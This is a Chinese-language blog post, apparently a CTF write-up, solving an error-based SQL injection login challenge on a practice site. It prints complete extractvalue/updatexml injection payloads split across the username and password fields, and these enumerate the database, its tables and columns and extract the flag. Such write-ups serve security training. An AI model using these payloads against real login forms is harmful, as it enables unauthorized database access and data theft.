PHP之 加了料的报错注入

  • 内容
  • 相关

地址: http://ctf5.shiyanbar.com/web/baocuo/index.php

一个ctf练习题   可以试试手

1.png

没有用户名和密码的输入框,因此不能直接在URL中传递username和password参数。要使用hackbar或者burpsuit传。


源码中的有用信息:

要用post提交username和password,所以用burp



首先尝试username=1&password=1,提示Login failed。


2.png


爆出当前库:username=‘or extractvalue /&password=/(1, concat(0x5c,(select database()))) or’


XPATH syntax error: ‘\error_based_hpf’

3.png
爆库:username=’ or updatexml/&password=1/(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema regexp database()),0x7e),1) or ’


XPATH syntax error: ‘ffll44jj,users’【error_based_hpf库中有ffll44jj,users两张表】

爆表:username=’ or updatexml/&password=1/(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema regexp database() and table_name regexp 0x66666c6c34346a6a),0x7e),1) or ’


XPATH syntax error: ‘value’【ffll44jj表中的列,表名用了16进制】

爆列:username=’ or updatexml/&password=1/(1,concat(0x7e,(select value from ffll44jj),0x7e),1) or ’


XPATH syntax error: ‘flag{err0r_b4sed_sqli_+_hpf}’



本文标签:

版权声明:若无特殊注明,本文皆为《小鱼cc》原创,转载请保留文章出处。

本文链接:PHP之 加了料的报错注入 - https://www.qzylytt.top/post-123.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

温馨提示:

上午好!今天你看上去好精神哦!!!
我知道了
写信给我
QQ联系
返回顶部